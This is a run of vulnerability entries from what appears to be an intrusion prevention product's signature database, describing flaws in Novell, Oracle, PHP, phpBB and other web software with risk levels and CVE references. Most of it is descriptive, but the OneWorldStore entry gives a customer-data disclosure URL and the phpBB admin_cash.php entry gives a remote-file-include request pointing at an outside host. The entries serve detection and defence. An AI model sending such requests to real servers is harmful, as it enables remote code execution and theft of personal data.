https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992

BID-17503
http://www.securityfocus.com/bid/17503

OSVDB-24617
http://www.osvdb.org/24617

HTTP-Novell-Groupwise-Messenger-HTTP-POST-Request-Invalid-Memory-Access

About this vulnerability:

Denial of service vulnerability in Novell GroupWise Messenger

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Malfunction

Description:

There is a denial of service vulnerability in the handling of crafted HTTP requests in Novell GroupWise Messenger. A successful exploitation leads to a denial of service condition.

References:

CVE-2006-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4511

BID-20316
http://www.securityfocus.com/bid/20316

OSVDB-29486
http://www.osvdb.org/29486

HTTP-Novell-Groupwise-WebAccess-HTTP-Basic-Authentication-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell GroupWise WebAccess

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Novell GroupWise

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Novell GroupWise WebAccess. An HTTP request that contains an excessively long base64 encoded string in the Authorization header field sent to the vulnerable Novell GroupWise WebAccess service leads to a denial of service or root/system level arbitrary code execution.

Situation:

HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow

References:

CVE-2007-2171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2171

BID-23556
http://www.securityfocus.com/bid/23556

HTTP-Novell-iManager-Tomcat-POST-Request-Denial-Of-Service

About this vulnerability:

Novell iManager Tomcat HTTP POST Request Handling Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Novell iManager

Type:

Buffer Overflow

Description:

There is a denial of service vulnerability in the Novell iManager Tomcat HTTP server component. The vulnerability is due to a failure to verify user-supplied data in incoming HTTP POST requests. An unauthenticated remote attacker can exploit this vulnerability to terminate the affected service.

Situation:

HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service

References:

CVE-2006-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4517

BID-20841
http://www.securityfocus.com/bid/20841

HTTP-Novell-iManager-Tree-Name-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Novell iManager

Risk:

Moderate

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Novell iManager

Type:

Buffer Overflow

Description:

There is a denial of service vulnerability in the Novell iManager. An unauthenticated remote attacker can exploit this vulnerability to terminate the affected service.

Situation:

HTTP_CRL-Novell-iManager-Tree-Name-Denial-Of-Service

References:

CVE-2010-1930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1930

BID-40485
http://www.securityfocus.com/bid/40485

OSVDB-65738
http://www.osvdb.org/65738

HTTP-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF

About this vulnerability:

Buffer overflow vulnerability in Novell iPrint Client for Windows

Risk:

High

First detected in:

sgpkg-ips-148-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell iPrint Client for Windows. By persuading a user to view a malicious web page, a remote attacker can execute arbitrary code with the privileges of the currently logged on user.

Situation:

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-Vulnerable-Method-Call

References:

CVE-2008-0935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0935

BID-27939
http://www.securityfocus.com/bid/27939

HTTP-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Novell iPrint Client

Risk:

Moderate

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell iPrint Client for Windows

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Novell iPrint Client. Successful exploitation allows termination of the Internet Explorer browser or non-privileged arbitrary code execution on a vulnerable host.

Situation:

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow

References:

CVE-2008-2908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2908

BID-29736
http://www.securityfocus.com/bid/29736

OSVDB-46194
http://www.osvdb.org/46194

HTTP-NPDS-Thold-SQL-Injection

About this vulnerability:

SQL injection vulnerability in NPDS thold parameter

Risk:

Moderate

First detected in:

sgpkg-ips-27-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NPDS

Type:

SQL Injection

Description:

NPDS has an input validation vulnerability in the handling of user supplied data. Remote attackers can execute arbitrary SQL commands via the 'thold' parameter in 'comments.php' or 'pollcomments.php'.

Situation:

HTTP_CSU-NPDS-Thold-SQL-Injection

References:

CVE-2005-1637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1637

BID-13649
http://www.securityfocus.com/bid/13649

HTTP-Nph-Test-Cgi-File-Disclosure

About this vulnerability:

nph-test-cgi allows remote users to view the filesystem

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

nph-test-cgi

Type:

Malfunction

Description:

A test script distributed with many http daemons, nph-test-cgi, does not sufficiently validate input. A remote attacker can view the server's filesystem by passing a suitable argument to the nph-test-cgi.

References:

CVE-1999-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0045

BID-686
http://www.securityfocus.com/bid/686

HTTP-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Winamp

Risk:

High

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Winamp

Type:

Buffer Overflow

Description:

Winamp has a heap-based buffer overflow vulnerability. A target user that has a vulnerable version of the affected product installed can be persuaded to follow a link with a prefix 'uvox://' to a malicious server that returns an HTTP response with an excessively large value in Ultravox-Max-Msg header field. This leads to a DoS terminating the affected product, or code execution with the privileges of the currently logged in user.

Situation:

HTTP_SHS-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow

References:

CVE-2006-5567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5567

BID-20744
http://www.securityfocus.com/bid/20744

OSVDB-30051
http://www.osvdb.org/30051

HTTP-Omnicron-OmniHTTPD-visadmin.exe-Resource-Starvation

About this vulnerability:

visadmin.exe can be exploited to fill hard disk.

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Omnicron OmniHTTPD

Type:

Malfunction

Description:

A cgi application visadmin.exe, installed by default within Omnicron OmniHTTPD, can be exploited to create a temporary file which fills hard disk. This can cause a denial of service until the file is deleted.

References:

CVE-1999-0970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0970

BID-1808
http://www.securityfocus.com/bid/1808

HTTP-OmniWeb-JavaScript-Alert-Format-String-Vulnerability

About this vulnerability:

A format string vulnerability in OmniWeb

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1555-5242

Platform:

Mac OS X

Software:

OmniWeb

Type:

Format String

Description:

There is a format string vulnerability in OmniWeb. Malicious javascript code on a web page may be used to execute code in the context of the current user, leading to system compromise.

Situation:

HTTP_OmniWeb-JavaScript-Alert-Format-String-Vulnerability

References:

CVE-2007-0148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0148

BID-21911
http://www.securityfocus.com/bid/21911

OSVDB-31222
http://www.osvdb.org/31222

HTTP-Oneworldstore-Owofflinecc-Information-Disclosure

About this vulnerability:

Oneworldstore user information disclosure vulnerability

Risk:

Low

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OneWorldStore

Type:

Malfunction

Description:

OneWorldStore shopping cart application suffers from an information disclosure vulnerability. Requests such as "http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1" will result to the disclosure of the buyers' names and addresses.

Situation:

HTTP_CSU-Oneworldstore-Owofflinecc-Information-Disclosure

References:

CVE-2005-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1329

BID-13361
http://www.securityfocus.com/bid/13361

OSVDB-15781
http://www.osvdb.org/15781

HTTP-Oracle-Bea-WebLogic-Transfer-Encoding-BOF

About this vulnerability:

Buffer Overflow vulnerability in Oracle Bea WebLogic

Risk:

High

First detected in:

sgpkg-ips-180-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle BEA WebLogic

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in BEA WebLogic Server Apache Connector. The vulnerability is due to a boundary error in the Apache connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation would allow the attacker to executearbitrary code on the vulnerable system with privileges of the running process, normally system.

Situation:

HTTP_CSH-Transfer-Encoding-Invalid
HTTP_CSH-Transfer-Encoding-Overflow

References:

CVE-2008-4008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4008

BID-31683
http://www.securityfocus.com/bid/31683

HTTP-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution

About this vulnerability:

A memory corruption vulnerability in Oracle ORADC ActiveX control

Risk:

High

First detected in:

sgpkg-ips-92-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle 8i; Oracle 9i; Oracle 10g

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Oracle ORADC ActiveX control included in Oracle Database Server. A call lacking the proper initialization to a specific method of the control can be used to corrupt the heap. This may lead to code execution or denial of service.

Situation:

HTTP_SS-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
File-Text_Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution

References:

BID-22026
http://www.securityfocus.com/bid/22026

HTTP-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting

About this vulnerability:

XSS vulnerabilities in Oracle HTTP Server isqlplus component

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle HTTP Server

Type:

Cross-site Scripting

Description:

Oracle HTTP Server 1.3.22 suffers from XSS vulnerabilities in its isqlplus component. Crafted requests containing script code to isqlplus parameters action, username, or password may allow cross-site scripting attacks.

Situation:

HTTP_CRL-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting

References:

CVE-2004-2115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2115

BID-9484
http://www.securityfocus.com/bid/9484

HTTP-Oracle-Suspected-Probe

About this vulnerability:	Suspected vulnerability probe of Oracle 8/9i
Risk:	Moderate
First detected in:	sgpkg-ips-791-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle 8i; Oracle 9i
Type:	Insecure Configuration
Description:	A remote user has been detected accessing potentially vulnerable end-points on an Oracle server.
Situation:	HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request

HTTP-Oracle-XSQLConfig.xml-Information-Disclosure-Vulnerability

About this vulnerability:

Information disclosure in Oracle 8i/9i

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i; Oracle 9i

Type:

Insecure Configuration

Description:

Due to insecure default configuration, any remote user is able to request configuration files "XSQLConfig.xml" and "soapConfig.xml". Those files contain sensitive information, such as database usernames and passwords.

Situation:

HTTP_CSU-Oracle-XSQLConfig.xml-Information-Disclosure

References:

CVE-2002-0568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568

BID-4290
http://www.securityfocus.com/bid/4290

HTTP-Oracle9i-Source-Code-Disclosure-Vulnerability

About this vulnerability:

Source code disclosure in Oracle 9i

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i

Type:

Malfunction

Description:

Due to a design error in the Oracle 9i application server, any remote user is able to request the source code of a jsp page. Globals.jsa is also accessible with the same method.

Situation:

HTTP_CSU-Oracle9i-Source-Code-Disclosure

References:

CVE-2002-0562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0562

BID-4034
http://www.securityfocus.com/bid/4034

HTTP-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Orbit Downloader

Risk:

Moderate

First detected in:

sgpkg-ips-158-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Windows

Software:

Orbit Downloader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Orbit Downloader. Successful exploitation allows non-privileged arbitrary code execution on a vulnerable host.

Situation:

HTTP_SS-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow

References:

CVE-2008-1602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1602

BID-28541
http://www.securityfocus.com/bid/28541

OSVDB-44036
http://www.osvdb.org/44036

HTTP-osCommerce-Response-Splitting

About this vulnerability:

Response splitting vulnerability in osCommerce

Risk:

Moderate

First detected in:

sgpkg-ips-29-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

osCommerce

Type:

Input Validation

Description:

osCommerce has multiple HTTP response splitting vulnerabilities. The application fails to parse properly user supplied input given to 'products_id' or 'pid' parameters in index.php. Remote attackers can exploit these vulnerabilities to spoof web content and poison web caches.

Situation:

HTTP_CSU-osCommerce-Response-Splitting

References:

CVE-2005-1951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951

BID-13979
http://www.securityfocus.com/bid/13979

OSVDB-17284
http://www.osvdb.org/17284

HTTP-Pafiledb-Session-Authentication-Information-Disclosure

About this vulnerability:

paFileDB shows users' password hashes

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

paFileDB

Type:

Malfunction

Description:

When paFileDB is used with session authentication, user names and password hashes are stored in a file readable by anyone. Remote attackers can access the directory where session files are stored and view information about all logged-in users.

References:

CVE-2004-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1219

BID-11818
http://www.securityfocus.com/bid/11818

HTTP-Panews-MySQL-Prefix-SQL-Injection

About this vulnerability:

PaNews arbitrary SQL injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

paNews

Type:

SQL Injection

Description:

PaNews has an SQL injection vulnerability in the handling of the 'mysql_prefix' parameter. The script allows remote attackers to execute arbitrary SQL queries into the underlying database by sending crafted HTTP requests.

Situation:

HTTP_CRL-Panews-MySQL-Prefix-SQL-Injection

References:

CVE-2005-0646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0646

BID-12687
http://www.securityfocus.com/bid/12687

HTTP-Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Panic Transmit FTP client

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Panic Trasmit

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Panic Transmit FTP client. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise.

Situation:

HTTP_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
File-Text_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow

References:

CVE-2007-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0020

BID-22145
http://www.securityfocus.com/bid/22145

OSVDB-32694
http://www.osvdb.org/32694

HTTP-Performer-Pfdispaly-Cgi-File-Disclosure

About this vulnerability:

pfdispaly.cgi allows reading of arbitrary files

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

IRIX

Software:

IRIX Performer API Search Tool

Type:

Metacharacter Injection

Description:

A flaw in pfdispaly.cgi in the IRIX Performer API Search Tool allows remote users to view arbitrary files from the host.

References:

CVE-1999-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0270

BID-64
http://www.securityfocus.com/bid/64

OSVDB-134
http://www.osvdb.org/134

HTTP-Phf-Cgi-Command-Execution-Vulnerability

About this vulnerability:

Command execution vulnerability in phf script

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache; NCSA HTTPd

Type:

Metacharacter Injection

Description:

A example CGI script, phf, allows remote attackers to execute arbitrary commands on the server. This is possible due to insufficient validation of user input in a library function escape_shell_cmd() found on older Apache and NCSA web servers.

Situation:

HTTP_CRL-Phf-Cgi-Command-Execution

References:

CVE-1999-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067

BID-629
http://www.securityfocus.com/bid/629

OSVDB-136
http://www.osvdb.org/136

HTTP-Phorum-Multiple-Php-Cross-Site

About this vulnerability:

Multiple php files in Phorum vulnerable to cross-site scripting

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Phorum

Type:

Malfunction

Description:

Multiple php scripts in Phorum version 3.4.5 and earlier are vulnerable to cross-site scripting. Arguments to Common.php, Profile.php's "EditError" variable and login.php's "Error" variable are not sanitized properly, allowing remote attackers to execute cross-site scripting attacks.

References:

CVE-2004-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0034

BID-9361
http://www.securityfocus.com/bid/9361

OSVDB-3510
http://www.osvdb.org/3510

OSVDB-3506
http://www.osvdb.org/3506

OSVDB-3434
http://www.osvdb.org/3434

HTTP-Phorum-Register-Php-SQL-Injection

About this vulnerability:

Phorum's register.php allows SQL injection

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Phorum

Type:

SQL Injection

Description:

Phorum's register.php has an SQL injection vulnerability, which allows remote attackers to execute SQL commands inside the script by passing suitable arguments to the "hide_email" field.

Situation:

HTTP_CRL-Phorum-Register-Php-SQL-Injection

References:

CVE-2004-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0035

BID-9361
http://www.securityfocus.com/bid/9361

OSVDB-3508
http://www.osvdb.org/3508

HTTP-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS

About this vulnerability:

Buffer overflow vulnerabilities in the PhotoStockPlus Uploader Tool ActiveX control

Risk:

High

First detected in:

sgpkg-ips-157-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PhotoStockPlus Uploader Tool

Type:

Buffer Overflow

Description:

There are buffer overflow vulnerabilities in the PhotoStockPlus Uploader Tool ActiveX control. By assigning an excessively long string to the Username or Password property via a crafted web site, a remote attacker can execute non-privileged arbitrary code on a vulnerable host.

Situation:

HTTP_SS-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
File-Text_PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS

References:

CVE-2008-0957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0957

BID-29279
http://www.securityfocus.com/bid/29279

OSVDB-45374
http://www.osvdb.org/45374

HTTP-Php-Cgi-BOF

About this vulnerability:

Buffer overflow in PHP cgi program php.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

Buffer overflow in PHP cgi program php.cgi, successful exploit allows shell access.

Situation:

HTTP_CSU-Php.cgi-Access

References:

CVE-1999-0058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0058

BID-712
http://www.securityfocus.com/bid/712

HTTP-Php-Cgi-File-Disclosure

About this vulnerability:

File disclosure vulnerability in php.cgi

Risk:

Moderate

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

Php.cgi allows attackers to read any file on the system.

Situation:

HTTP_CSU-Php.cgi-Possible-File-Disclosure

References:

CVE-1999-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0238

BID-2250
http://www.securityfocus.com/bid/2250

HTTP-Php-Crlf-Fake-Header-Injection

About this vulnerability:

Fake HTTP header injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-182-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

A vulnerability exists in PHP that allows an attacker to use a remote PHP script as a proxy or open mail relay, possibly bypassing firewall access controls.

Situation:

HTTP_CRL-Php-Crlf-Header-Injection-Proxing-Attack

References:

CVE-2002-1783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783

BID-5681
http://www.securityfocus.com/bid/5681

HTTP-Php-Error-Logging-Format-Strigs-Vulnerability

About this vulnerability:

Php Error Logging Format String Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Unix

Software:

PHP

Type:

Format String

Description:

Php Error logging contains a vulnerability which, if error logging is enabled, can be exploited to gain full control of the victim host.

Situation:

HTTP_CS-Php-Error-Loggin-Format-Strings-Vuln
HTTP_CS-Php-Error-Logging-Format-Strings-Vuln-2
HTTP_CS-Php-Error-Logging-Format-String-Vuln-3
HTTP_CSU-Php-Error-Loggin-Format-Strigs-Vuln-Strengur

References:

CVE-2000-0967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0967

BID-1786
http://www.securityfocus.com/bid/1786

HTTP-Php-Escapeshellcmd-Command-Execution

About this vulnerability:

Vulnerability in escapeshellcmd function allows remote execution

Risk:

High

First detected in:

sgpkg-ips-182-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PHP

Type:

Input Validation

Description:

A security flaw exists in certain versions of the PHP interpreter on Windows platforms. The flaw is in escapeshellcmd function, and if exploited successfully, the vulnerability allows remote command execution

Situation:

HTTP_CRL-Php-Shell-Escape-Functions-Command-Execution

References:

CVE-2004-0542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542

BID-10471
http://www.securityfocus.com/bid/10471

OSVDB-6710
http://www.osvdb.org/6710

HTTP-Php-Function-Header-Injection

About this vulnerability:

PHP allows injection of HTTP headers with certain functions

Risk:

Low

First detected in:

sgpkg-ips-89-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

Certain functions of PHP language do not validate input sufficiently, allowing HTTP header injection.

Situation:

HTTP_CSU-Php-Function-Header-Injection

References:

CVE-2002-1783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783

BID-5681
http://www.securityfocus.com/bid/5681

HTTP-Php-Fusion-Database-Backup-Disclosure

About this vulnerability:

Database backup file disclosure vulnerability in PHP-Fusion

Risk:

Moderate

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP-Fusion

Type:

Insecure Configuration

Description:

The instructions of PHP-Fusion 4.0 advise users to set the permissions on the database backups directory to world read/write/execute. A remote attacker can download or view database backups, which have easily guessable filenames. From these backups, the attacker can find out the administrator username and password.

Situation:

HTTP_CSU-Php-Fusion-Database-Backup-Disclosure

References:

CVE-2004-1724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1724

BID-10974
http://www.securityfocus.com/bid/10974

HTTP-Php-Globals-Parameter-Usage

About this vulnerability:	PHP GLOBALS parameter usage
Risk:	Moderate
First detected in:	sgpkg-ips-64-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Malfunction
Description:	PHP has a group of variable arrays called superglobals, which are accessible from all functions and methods. One of the superglobals, $GLOBALS, is a reference to the global symbol table. In certain versions of PHP, the $GLOBALS array can be modified via HTTP requests. This allows attackers to influence the execution of a server side script by initializing global variables used by the script to arbitrary values. Depending on the server side script different outcomes may be achieved by utilizing this vulnerability, including arbitrary PHP code execution on the server.
Situation:	HTTP_CS-Php-Globals-Parameter-Usage

HTTP-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability

About this vulnerability:

Multipart HTTP POST request can be used to overwrite PHP GLOBALS array

Risk:

Moderate

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

Certain versions of PHP suffer from a vulnerability where an HTTP POST request can be used to modify the GLOBALS array when register_globals is enabled. This PHP vulnerability allows remote attackers to further exploit other vulnerabilities in PHP scripts.

Situation:

HTTP_CS-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability

References:

CVE-2005-3390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390

BID-15250
http://www.securityfocus.com/bid/15250

HTTP-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise

About this vulnerability:

PHP-Nuke command execution vulnerability via admin_styles.php phpbb_root_path parameter

Risk:

High

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP-Nuke

Type:

Malfunction

Description:

7.x versions of PHP-Nuke allow arbitrary php files to be included via the phpbb_root_path parameter in admin_styles.php. The vulnerability allows remote attackers to execute arbitrary PHP code on the host running a vulnerable version of the software.

Situation:

HTTP_CSU-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise

References:

CVE-2006-2828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828

HTTP-Php-Phpinfo-XSS

About this vulnerability:	Phpinfo Cross-Site Scripting vulnerability
Risk:	Low
First detected in:	sgpkg-ips-183-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Cross-site Scripting
Description:	A vulnerability exists in PHP that allows an remote attacker to implement Cross-site Scripting attacks in the target server running vulnerable PHP software
Situation:	HTTP_CS-Php-Phpinfo-XSS-Post HTTP_CSU-Php-Phpinfo-XSS-Get HTTP_CSH-Possible-Script-In-Header HTTP_CRL-Script-In-Request HTTP_CRL-Script-In-Get-Request HTTP_CRL-Possible-Script-In-Get-Request HTTP_CRL-Possible-Script-In-Request

HTTP-Phpbb-Admin-Cash-Php-System-Compromise

About this vulnerability:

PhpBB allows remote users to execute arbitrary php

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpBB

Type:

Malfunction

Description:

PhpBB's admin_cash.php allows remote users to execute arbitrary php code. Admin_cash.php includes the file phpbb_root_path/includes/functions_selects.php, and the phpbb_root_path can be set to point to an arbitrary location with a request like "http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w"

Situation:

HTTP_CS-Phpbb-Admin-Cash-Php-System-Compromise

References:

CVE-2004-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1535

BID-11701
http://www.securityfocus.com/bid/11701

HTTP-Phpbb-Viewtopic-Urldecode-System-Compromise

About this vulnerability:

PhpBB allows remote attackers to execute arbitrary commands

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpBB

Type:

Malfunction

Description:

PhpBB's view_topic.php fails to remove critical characters from its input, allowing remote attackers to execute arbitrary commands with a specially-crafted HTTP request.

Situation:

HTTP_CRL-Phpbb-Viewtopic-Urldecode-System-Compromise

References:

BID-11672
http://www.securityfocus.com/bid/11672

HTTP-PhpDig-Config-Php-System-Compromise

About this vulnerability:

PhpDig config.php allows arbitrary PHP code execution

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpDig

Type:

Malfunction

Description:

PhpDig's config.php includes scripts from $relative_script_path/. This allows remote attackers to execute arbitrary PHP code on the host by setting the relative_script_path parameter to point to a URL that contains the file locales/en-language.php.

Situation:

HTTP_CRL-PhpDig-Config-Php-System-Compromise

References:

CVE-2004-0068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068

BID-9424
http://www.securityfocus.com/bid/9424

HTTP-PhpGedView-Admin-Php-Information-Disclosure

About this vulnerability:

Admin.php of PHPGedview can disclose sensitive information about the host

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

PhpGedView

Type:

Malfunction

Description:

Admin.php of PHPGedview allows remote users to access information displayed by the phpinfo() function. This can disclose sensitive information about the host.

References:

CVE-2004-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033

BID-9371
http://www.securityfocus.com/bid/9371

OSVDB-3404
http://www.osvdb.org/3404

HTTP-PhpGedView-Change-Admin-Password

About this vulnerability:

Possibility to change admin password in PhpGedView

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Unix

Software:

PhpGedView

Type:

Malfunction

Description:

PhpGedView versions 2.61 and earlier allow remote attackers to re-install editconfig.php to change the administrator password, leading to unauthorized access of application data.

References:

CVE-2004-0031
